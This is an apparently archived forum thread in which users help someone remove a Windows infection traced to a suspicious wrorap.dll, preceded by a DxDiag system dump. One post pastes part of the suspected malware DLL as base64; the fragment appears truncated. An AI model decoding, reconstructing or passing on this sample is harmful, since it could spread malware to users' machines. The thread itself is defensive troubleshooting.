Name: Intel(R) ICH9 Family USB Universal Host Controller - 2938 Device ID: PCI\VEN_8086&DEV_2938&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D1 Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes
Name: Intel(R) 82801 PCI Bridge - 2448 Device ID: PCI\VEN_8086&DEV_2448&SUBSYS_02AA1028&REV_93\3&18D45AA6&0&F0 Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes
Name: Intel(R) ICH9 Family PCI Express Root Port 3 - 2944 Device ID: PCI\VEN_8086&DEV_2944&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E2 Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes
Name: Intel(R) ICH9 Family USB Universal Host Controller - 2937 Device ID: PCI\VEN_8086&DEV_2937&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&D0 Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes
Name: Dell Wireless 1397 WLAN Mini-Card Device ID: PCI\VEN_14E4&DEV_4315&SUBSYS_000C1028&REV_01\4&1B317842&0&00E1 Driver: C:\Windows\system32\DRIVERS\BCMWL6.SYS, 5.30.0021.0000 (English), 7/8/2009 01:45:32, 2506232 bytes Driver: C:\Windows\system32\drivers\vwifibus.sys, 6.01.7600.16385 (English), 7/13/2009 19:52:02, 19968 bytes
Name: Intel(R) ICH9 Family PCI Express Root Port 2 - 2942 Device ID: PCI\VEN_8086&DEV_2942&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&E1 Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.01.7601.17514 (English), 11/20/2010 08:30:06, 153984 bytes
Name: Intel(R) ICH9 Family USB Universal Host Controller - 2936 Device ID: PCI\VEN_8086&DEV_2936&SUBSYS_02AA1028&REV_03\3&18D45AA6&0&EA Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.01.7601.17586 (English), 3/24/2011 22:57:56, 24064 bytes Driver: C:\Windows\system32\drivers\usbport.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:07, 284672 bytes Driver: C:\Windows\system32\drivers\usbhub.sys, 6.01.7601.17586 (English), 3/24/2011 22:58:37, 258560 bytes
Name: Marvell Yukon 88E8040 PCI-E Fast Ethernet Controller Device ID: PCI\VEN_11AB&DEV_4354&SUBSYS_02AA1028&REV_13\4&2AC8D8A2&0&00E2 Driver: n/a
------------------ DirectShow Filters ------------------
DirectShow Filters: WMAudio Decoder DMO,0x00800800,1,1,WMADMOD.DLL,6.01.7601.17514 WMAPro over S/PDIF DMO,0x00600800,1,1,WMADMOD.DLL,6.01.7601.17514 WMSpeech Decoder DMO,0x00600800,1,1,WMSPDMOD.DLL,6.01.7601.17514 MP3 Decoder DMO,0x00600800,1,1,mp3dmod.dll,6.01.7600.16385 Mpeg4s Decoder DMO,0x00800001,1,1,mp4sdecd.dll,6.01.7600.16385 WMV Screen decoder DMO,0x00600800,1,1,wmvsdecd.dll,6.01.7601.17514 WMVideo Decoder DMO,0x00800001,1,1,wmvdecod.dll,6.01.7601.17514 Mpeg43 Decoder DMO,0x00800001,1,1,mp43decd.dll,6.01.7600.16385 Mpeg4 Decoder DMO,0x00800001,1,1,mpg4decd.dll,6.01.7600.16385 CyberLink AudioCD Filter,0x00600000,0,1,CLAudioCD.ax,5.00.0000.4417 WMT VIH2 Fix,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 Record Queue,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 WMT Switch Filter,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 WMT Virtual Renderer,0x00200000,1,0,WLXVAFilt.dll,15.04.3538.0513 WMT DV Extract,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 WMT Virtual Source,0x00200000,0,1,WLXVAFilt.dll,15.04.3538.0513 WMT Sample Information Filter,0x00200000,1,1,WLXVAFilt.dll,15.04.3538.0513 DV Muxer,0x00400000,0,0,qdv.dll,6.06.7601.17514 CyberLink Audio Wizard,0x00200001,1,1,CLAudWizard.ax,1.00.0000.3616 Color Space Converter,0x00400001,1,1,quartz.dll,6.06.7601.17713 WM ASF Reader,0x00400000,0,0,qasf.dll,12.00.7601.17514 Screen Capture filter,0x00200000,0,1,wmpsrcwp.dll,12.00.7601.17514 AVI Splitter,0x00600000,1,1,quartz.dll,6.06.7601.17713 VGA 16 Color Ditherer,0x00400000,1,1,quartz.dll,6.06.7601.17713 SBE2MediaTypeProfile,0x00200000,0,0,sbe.dll,6.06.7601.17528 Microsoft DTV-DVD Video Decoder,0x005fffff,2,4,msmpeg2vdec.dll,6.01.7140.0000 CyberLink DVD Navigator,0x00200000,0,3,CLNavX.ax,8.00.0000.0121 AC3 Parser Filter,0x00600000,1,1,mpg2splt.ax,6.06.7601.17528 StreamBufferSink,0x00200000,0,0,sbe.dll,6.06.7601.17528 Microsoft TV Captions Decoder,0x00200001,1,0,MSTVCapn.dll,6.01.7601.17715 MJPEG Decompressor,0x00600000,1,1,quartz.dll,6.06.7601.17713 CBVA DMO wrapper filter,0x00200000,1,1,cbva.dll,6.01.7601.17514 MPEG-I Stream Splitter,0x00600000,1,2,quartz.dll,6.06.7601.17713 SAMI (CC) Parser,0x00400000,1,1,quartz.dll,6.06.7601.17713 CyberLink Audio Spectrum Analyzer,0x00200000,1,1,CLAudSpa.ax,1.00.0000.0924 VBI Codec,0x00600000,1,4,VBICodec.ax,6.06.7601.17514 MPEG-2 Splitter,0x005fffff,1,0,mpg2splt.ax,6.06.7601.17528 Closed Captions Analysis Filter,0x00200000,2,5,cca.dll,6.06.7601.17514 SBE2FileScan,0x00200000,0,0,sbe.dll,6.06.7601.17528 Microsoft MPEG-2 Video Encoder,0x00200000,1,1,msmpeg2enc.dll,6.01.7601.17514 CyberLink Demultiplexer,0x00200000,1,0,cldemuxer.ax,1.00.0000.4528 Internal Script Command Renderer,0x00800001,1,0,quartz.dll,6.06.7601.17713 MPEG Audio Decoder,0x03680001,1,1,quartz.dll,6.06.7601.17713 DV Splitter,0x00600000,1,2,qdv.dll,6.06.7601.17514 Video Mixing Renderer 9,0x00200000,1,0,quartz.dll,6.06.7601.17713 Haali Media Splitter,0x00600001,0,1,, Microsoft MPEG-2 Encoder,0x00200000,2,1,msmpeg2enc.dll,6.01.7601.17514 ACM Wrapper,0x00600000,1,1,quartz.dll,6.06.7601.17713 Video Renderer,0x00800001,1,0,quartz.dll,6.06.7601.17713 MPEG-2 Video Stream Analyzer,0x00200000,0,0,sbe.dll,6.06.7601.17528 Line 21 Decoder,0x00600000,1,1,qdvd.dll,6.06.7601.17713 Video Port Manager,0x00600000,2,1,quartz.dll,6.06.7601.17713 Video Renderer,0x00400000,1,0,quartz.dll,6.06.7601.17713 File Writer,0x00200000,1,0,WLXVAFilt.dll,15.04.3538.0513 VPS Decoder,0x00200000,0,0,WSTPager.ax,6.06.7601.17514 WM ASF Writer,0x00400000,0,0,qasf.dll,12.00.7601.17514 VBI Surface Allocator,0x00600000,1,1,vbisurf.ax,6.01.7601.17514 CyberLink Audio Decoder,0x00200000,1,1,Claud.ax,6.03.0000.1124 File writer,0x00200000,1,0,qcap.dll,6.06.7601.17514 iTV Data Sink,0x00600000,1,0,itvdata.dll,6.06.7601.17514 iTV Data Capture filter,0x00600000,1,1,itvdata.dll,6.06.7601.17514 DVD Navigator,0x00200000,0,3,qdvd.dll,6.06.7601.17713 Microsoft TV Subtitles Decoder,0x00200001,1,0,MSTVCapn.dll,6.01.7601.17715 Overlay Mixer2,0x00200000,1,1,qdvd.dll,6.06.7601.17713 CyberLink TimeStretch Filter,0x00200000,1,1,clauts.ax,1.00.0000.5423 Haali Matroska Muxer,0x00200000,1,0,, AVI Draw,0x00600064,9,1,quartz.dll,6.06.7601.17713 RDP DShow Redirection Filter,0xffffffff,1,0,DShowRdpFilter.dll, CyberLink Audio Effect,0x00200000,1,1,CLAudFx.ax,6.00.0000.5723 Microsoft MPEG-2 Audio Encoder,0x00200000,1,1,msmpeg2enc.dll,6.01.7601.17514 WST Pager,0x00200000,1,1,WSTPager.ax,6.06.7601.17514 MPEG-2 Demultiplexer,0x00600000,1,1,mpg2splt.ax,6.06.7601.17528 DV Video Decoder,0x00800000,1,1,qdv.dll,6.06.7601.17514 Cyberlink SubTitle Importor,0x00200000,1,1,CLSubTitle.ax,1.00.0000.4716 SampleGrabber,0x00200000,1,1,qedit.dll,6.06.7601.17514 Null Renderer,0x00200000,1,0,qedit.dll,6.06.7601.17514 MPEG-2 Sections and Tables,0x005fffff,1,0,Mpeg2Data.ax,6.06.7601.17514 Microsoft AC3 Encoder,0x00200000,1,1,msac3enc.dll,6.01.7601.17514 StreamBufferSource,0x00200000,0,0,sbe.dll,6.06.7601.17528 Smart Tee,0x00200000,1,2,qcap.dll,6.06.7601.17514 Overlay Mixer,0x00200000,0,0,qdvd.dll,6.06.7601.17713 CyberLink Video Effect,0x00200000,1,1,CLVidFx.ax,1.00.0000.1523 CyberLink Video/SP Decoder,0x00600000,2,3,CLVSD.ax,8.02.0000.1117 AVI Decompressor,0x00600000,1,1,quartz.dll,6.06.7601.17713 NetBridge,0x00200000,2,0,netbridge.dll,6.01.7601.17514 AVI/WAV File Source,0x00400000,0,2,quartz.dll,6.06.7601.17713 Wave Parser,0x00400000,1,1,quartz.dll,6.06.7601.17713 MIDI Parser,0x00400000,1,1,quartz.dll,6.06.7601.17713 Multi-file Parser,0x00400000,1,1,quartz.dll,6.06.7601.17713 File stream renderer,0x00400000,1,1,quartz.dll,6.06.7601.17713 CyberLink Line21 Decoder Filter,0x00200000,0,2,CLLine21.ax,4.00.0000.9027 Microsoft DTV-DVD Audio Decoder,0x005fffff,1,1,msmpeg2adec.dll,6.01.7140.0000 StreamBufferSink2,0x00200000,0,0,sbe.dll,6.06.7601.17528 AVI Mux,0x00200000,1,0,qcap.dll,6.06.7601.17514 Line 21 Decoder 2,0x00600002,1,1,quartz.dll,6.06.7601.17713 File Source (Async.),0x00400000,0,1,quartz.dll,6.06.7601.17713 File Source (URL),0x00400000,0,1,quartz.dll,6.06.7601.17713 Media Center Extender Encryption Filter,0x00200000,2,2,Mcx2Filter.dll,6.01.7601.17514 AudioRecorder WAV Dest,0x00200000,0,0,WavDest.dll, AudioRecorder Wave Form,0x00200000,0,0,WavDest.dll, SoundRecorder Null Renderer,0x00200000,0,0,WavDest.dll, Infinite Pin Tee Filter,0x00200000,1,1,qcap.dll,6.06.7601.17514 Enhanced Video Renderer,0x00200000,1,0,evr.dll,6.01.7601.17514 BDA MPEG2 Transport Information Filter,0x00200000,2,0,psisrndr.ax,6.06.7601.17669 MPEG Video Decoder,0x40000001,1,1,quartz.dll,6.06.7601.17713
WDM Streaming Tee/Splitter Devices: Tee/Sink-to-Sink Converter,0x00200000,1,1,ksproxy.ax,6.01.7601.17514
Video Compressors: WMVideo8 Encoder DMO,0x00600800,1,1,wmvxencd.dll,6.01.7600.16385 WMVideo9 Encoder DMO,0x00600800,1,1,wmvencod.dll,6.01.7600.16385 MSScreen 9 encoder DMO,0x00600800,1,1,wmvsencd.dll,6.01.7600.16385 DV Video Encoder,0x00200000,0,0,qdv.dll,6.06.7601.17514 MJPEG Compressor,0x00200000,0,0,quartz.dll,6.06.7601.17713 Cinepak Codec by Radius,0x00200000,1,1,qcap.dll,6.06.7601.17514 Intel IYUV codec,0x00200000,1,1,qcap.dll,6.06.7601.17514 Intel IYUV codec,0x00200000,1,1,qcap.dll,6.06.7601.17514 Microsoft RLE,0x00200000,1,1,qcap.dll,6.06.7601.17514 Microsoft Video 1,0x00200000,1,1,qcap.dll,6.06.7601.17514
Audio Compressors: WM Speech Encoder DMO,0x00600800,1,1,WMSPDMOE.DLL,6.01.7600.16385 WMAudio Encoder DMO,0x00600800,1,1,WMADMOE.DLL,6.01.7600.16385 IMA ADPCM,0x00200000,1,1,quartz.dll,6.06.7601.17713 PCM,0x00200000,1,1,quartz.dll,6.06.7601.17713 Microsoft ADPCM,0x00200000,1,1,quartz.dll,6.06.7601.17713 GSM 6.10,0x00200000,1,1,quartz.dll,6.06.7601.17713 Messenger Audio Codec,0x00200000,1,1,quartz.dll,6.06.7601.17713 CCITT A-Law,0x00200000,1,1,quartz.dll,6.06.7601.17713 CCITT u-Law,0x00200000,1,1,quartz.dll,6.06.7601.17713 MPEG Layer-3,0x00200000,1,1,quartz.dll,6.06.7601.17713
Audio Capture Sources: Microphone (High Definition Aud,0x00200000,0,0,qcap.dll,6.06.7601.17514
PBDA CP Filters: PBDA DTFilter,0x00600000,1,1,CPFilters.dll,6.06.7601.17528 PBDA ETFilter,0x00200000,0,0,CPFilters.dll,6.06.7601.17528 PBDA PTFilter,0x00200000,0,0,CPFilters.dll,6.06.7601.17528
Midi Renderers: Default MidiOut Device,0x00800000,1,0,quartz.dll,6.06.7601.17713 Microsoft GS Wavetable Synth,0x00200000,1,0,quartz.dll,6.06.7601.17713
WDM Streaming Capture Devices: HD Audio Microphone 2,0x00200000,1,1,ksproxy.ax,6.01.7601.17514
WDM Streaming Rendering Devices: HD Audio Headphone/Speakers,0x00200000,1,1,ksproxy.ax,6.01.7601.17514
BDA Network Providers: Microsoft ATSC Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.7601.17514 Microsoft DVBC Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.7601.17514 Microsoft DVBS Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.7601.17514 Microsoft DVBT Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.7601.17514 Microsoft Network Provider,0x00200000,0,1,MSNP.ax,6.06.7601.17514
Multi-Instance Capable VBI Codecs: VBI Codec,0x00600000,1,4,VBICodec.ax,6.06.7601.17514
BDA Transport Information Renderers: BDA MPEG2 Transport Information Filter,0x00600000,2,0,psisrndr.ax,6.06.7601.17669 MPEG-2 Sections and Tables,0x00600000,1,0,Mpeg2Data.ax,6.06.7601.17514
BDA CP/CA Filters: Decrypt/Tag,0x00600000,1,1,EncDec.dll,6.06.7601.17708 Encrypt/Tag,0x00200000,0,0,EncDec.dll,6.06.7601.17708 PTFilter,0x00200000,0,0,EncDec.dll,6.06.7601.17708 XDS Codec,0x00200000,0,0,EncDec.dll,6.06.7601.17708
WDM Streaming Communication Transforms: Tee/Sink-to-Sink Converter,0x00200000,1,1,ksproxy.ax,6.01.7601.17514
Audio Renderers: Speakers (High Definition Audio,0x00200000,1,0,quartz.dll,6.06.7601.17713 CyberLink Audio Renderer,0x00200000,1,0,cladr.ax,6.00.0000.5222 Default DirectSound Device,0x00800000,1,0,quartz.dll,6.06.7601.17713 Default WaveOut Device,0x00200000,1,0,quartz.dll,6.06.7601.17713 DirectSound: Speakers (High Definition Audio Device),0x00200000,1,0,quartz.dll,6.06.7601.17713
--------------- EVR Power Information --------------- Current Setting: {651288E5-A7ED-4076-A96B-6CC62D848FE1} (Balanced) Quality Flags: 2576 Enabled: Force throttling Allow half deinterlace Allow scaling Decode Power Usage: 100 Balanced Flags: 1424 Enabled: Force throttling Allow batching Force half deinterlace Force scaling Decode Power Usage: 50 PowerFlags: 1424 Enabled: Force throttling Allow batching Force half deinterlace Force scaling Decode Power Usage: 0
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 12:42:57 AM
What is this; O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep
Nothing else stands out to me atleast.
Do I "fix" it? Most definitely! Before you go wiping it though, let's make sure it did not make any way to copy itself again. First kill all the iexplorer.exe running in taskmanager, that's scary. ;p And the Flash_util_activex after. Then browse to My Computer, click the c: drive and use the search box at top right to search for wrorap.dll What we are wanting to do is, one get a copy of it and, two find out when it was created. Please email a copy to 'titusville tech AT gmail . com (remove spaces). Once you know the date it was creatd do another file search for all files created or modified on that same date, using the advanced search functions. Please share if you find anything. At this point also run the fix for that one file atleast. Let us know if your date modified/created search returns anything unusual. cheers
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 12:58:38 AM
What is this; O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep
Nothing else stands out to me atleast.
Do I "fix" it? Most definitely! Before you go wiping it though, let's make sure it did not make any way to copy itself again. First kill all the iexplorer.exe running in taskmanager, that's scary. ;p And the Flash_util_activex after. Then browse to My Computer, click the c: drive and use the search box at top right to search for wrorap.dll What we are wanting to do is, one get a copy of it and, two find out when it was created. Please email a copy to 'titusville tech AT gmail . com (remove spaces). Once you know the date it was creatd do another file search for all files created or modified on that same date, using the advanced search functions. Please share if you find anything. At this point also run the fix for that one file atleast. Let us know if your date modified/created search returns anything unusual. cheers Here's the file in base64 encoding (I also sent an email, but this is more public). TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAADRDTOwlWxd45VsXeOVbF3j93NO45dsXePucFHjl2xd431zV+OQbF3jlWxc 46FsXeMtalvjlGxd431zVuOebF3jfXNZ45FsXeNSaWNolWxd4wAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAFBFAABMAQUAxoGeSwAAAAAAAAAA4AACIQsBCAAARgEAAJIFAAAAAACKmAAAABAAAABgAQAA AAAQABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAAAHAAAEAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQ AAAAAAAAEAAAAMSdAgCQAAAAtJICAHgAAAAA4AUAnv8AAAAAAAAAAAAAAAAAAAAAAAAA4AYA1BUA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAQAUAgAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAADQRQEAABAAAABGAQAABAAAAAAAAAAAAAAA AAAAIAAAYC5yZGF0YQAAY10DAABgAQAAXgMAAEoBAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAHwd AQAAwAQAABgBAACoBAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADJ/wAAAOAFAAAAAQAAwAUAAAAA AAAAAAAAAAAAQAAAQC5yZWxvYwAA/BUAAADgBgAAFgAAAMAGAAAAAAAAAAAAAAAAAEAAAEAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 hcCJRCQcD4Xz+///iy
Edit: There was something here, but I realized that was the quarantine. Never mind.
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 01:09:08 AM
Are you using a device from Midiman called M-Audio or some such via firewire?
edit; if it will let you, enable the BITS (Background Intelligent Transfer Service) service from services.msc and see if you can then access the windows update functions.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 01:18:45 AM
edit; if it will let you, enable the BITS (Background Intelligent Transfer Service) service from services.msc and see if you can then access the windows update functions.
None of these services exist anymore: - BITS
- Microsoft Antimalware
- Windows Firewall
- Windows Update
Are you using a device from Midiman called M-Audio or some such via firewire?
The file has definately been renamed and corrupted. Here are some suspicious traits: No permissions have been assigned for this object.
Warning: this is a potential security risk because anyone who can access this object can take ownership of it. The object’s owner should assign permissions as soon as possible.
Original filename: mafwcpl.exe
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 01:24:32 AM
edit; if it will let you, enable the BITS (Background Intelligent Transfer Service) service from services.msc and see if you can then access the windows update functions.
None of these services exist anymore: - BITS
- Microsoft Antimalware
- Windows Firewall
- Windows Update
Are you using a device from Midiman called M-Audio or some such via firewire?
The file has definately been renamed and corrupted. Here are some suspicious traits: No permissions have been assigned for this object.
Warning: this is a potential security risk because anyone who can access this object can take ownership of it. The object’s owner should assign permissions as soon as possible.
Original filename: mafwcpl.exe
aye, that file we have now is not the orginal. Did you find anything else modified aorund the same time? As far as the missing services. OUCH. you are likely going to need to at the very least run a repair install of Win 7
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 01:40:46 AM
I have a restore point from the last Windows update. Will that restore the missing services?
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 01:41:51 AM
I have a restore point from the last Windows update. Will that restore the missing services?
Is that date before that file was created? And I am not totally sure on that. It kind of depends in what manner they have been removed.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 01:43:57 AM
I have a restore point from the last Windows update. Will that restore the missing services?
Is that date before that file was created? And I am not totally sure on that. It kind of depends in what manner they have been removed. Yes, and windows update was certainly working. I guess I'll try, and if that doesn't work, repair install. Thanks for your help! It saved me a lot of grief and was greatly appreciated. BTW: wrorap.dll somehow hacked the web browsers (it was being used by them when I tried to delete it). That's what was causing the redirects.
Title: Re: Windows infection: please help a security newbie
Post by: check_status on July 23, 2012, 02:19:59 AM
Probably installed javascript into the profile of Firefox, you may need to create a new profile.
Title: Re: Windows infection: please help a security newbie
Post by: finkleshnorts on July 23, 2012, 04:07:04 AM
I have a restore point from the last Windows update. Will that restore the missing services?
Is that date before that file was created? And I am not totally sure on that. It kind of depends in what manner they have been removed. Yes, and windows update was certainly working. I guess I'll try, and if that doesn't work, repair install. Thanks for your help! It saved me a lot of grief and was greatly appreciated. BTW: wrorap.dll somehow hacked the web browsers (it was being used by them when I tried to delete it). That's what was causing the redirects. restore points can be infected.
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 04:39:24 AM
Probably installed javascript into the profile of Firefox, you may need to create a new profile.
aye, not a bad idea at all. I take it you were able to remove it in safemode? Was firefox the only browser that was redicreting on you? Probably will not hurt to reinstall any other browsers you were using as well. And now you got me curious as to the source or that thing. I hadn't bothered to decompile that dll to see the actual script in it as I figured you had it whipped. But it could not hurt to. Another handy trick is to find a compiled piece of the malicious code to use to search for inside of all the files on your comp. I've been able to find quite a few left over 'dormant' pieces of nasties that would have otherwise went undected that way. Let us know if you still have issues removing that file. Or skip ahead of posting again and use; http://www.scanwith.com/Pocket_KillBox_download.htm Add the file path to the box, check the 'delete on reboot' option and then if you ae ready to reboot, hit the lil red x tot he right of the file location input. That should have no issues removing it. If so, let us 